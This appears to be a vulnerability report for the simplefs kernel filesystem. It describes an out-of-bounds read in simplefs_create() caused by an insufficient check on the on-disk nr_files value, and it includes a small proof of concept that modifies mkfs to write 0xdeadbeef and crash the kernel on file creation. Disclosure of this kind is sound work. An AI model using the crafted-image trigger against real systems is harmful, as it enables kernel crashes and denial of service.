Array out of bounds caused by eblock->nr_files

[chennbnbnb]

function simplefs_create() miss check whether eblock->nr_files bigger than SIMPLEFS_MAX_SUBFILES
so when eblock->nr_files is large, eblock->extents[ei].ee_start will cause array out of bounds problem

static int simplefs_create(struct inode* dir, 
    struct dentry* dentry,
    umode_t mode, 
    bool excl)
{

    ci_dir = SIMPLEFS_INODE(dir); 
    sb = dir->i_sb; 
    bh = sb_bread(sb, ci_dir->ei_block); 
    eblock = (struct simplefs_file_ei_block*)bh->b_data;

    if (eblock->nr_files == SIMPLEFS_MAX_SUBFILES) {    //nr_files may be very large
        ret = -EMLINK;
        goto end;
    }
    ...;
    ei = eblock->nr_files / SIMPLEFS_FILES_PER_EXT; //ei may be very large
    bi = eblock->nr_files % SIMPLEFS_FILES_PER_EXT / SIMPLEFS_FILES_PER_BLOCK;
    fi = eblock->nr_files % SIMPLEFS_FILES_PER_BLOCK;

    if (!eblock->extents[ei].ee_start) {    //out of bound read
        ...;
    }
    ...;
}

To get a PoC, change function write_data_blocks() in mkfs.c like that,
nr_files of root dir will be very large

static int write_data_blocks(int fd, struct superblock* sb)
{
    uint32_t* tmp = calloc(1, SIMPLEFS_BLOCK_SIZE);
    tmp[0] = 0xdeadbeef;   //nr_files = 0xdeadbeef
    write(fd, tmp, SIMPLEFS_BLOCK_SIZE);
    return 0;
}

mount this disk image created by mkfs.simplefs and then try to create file in root dir, you will get a crash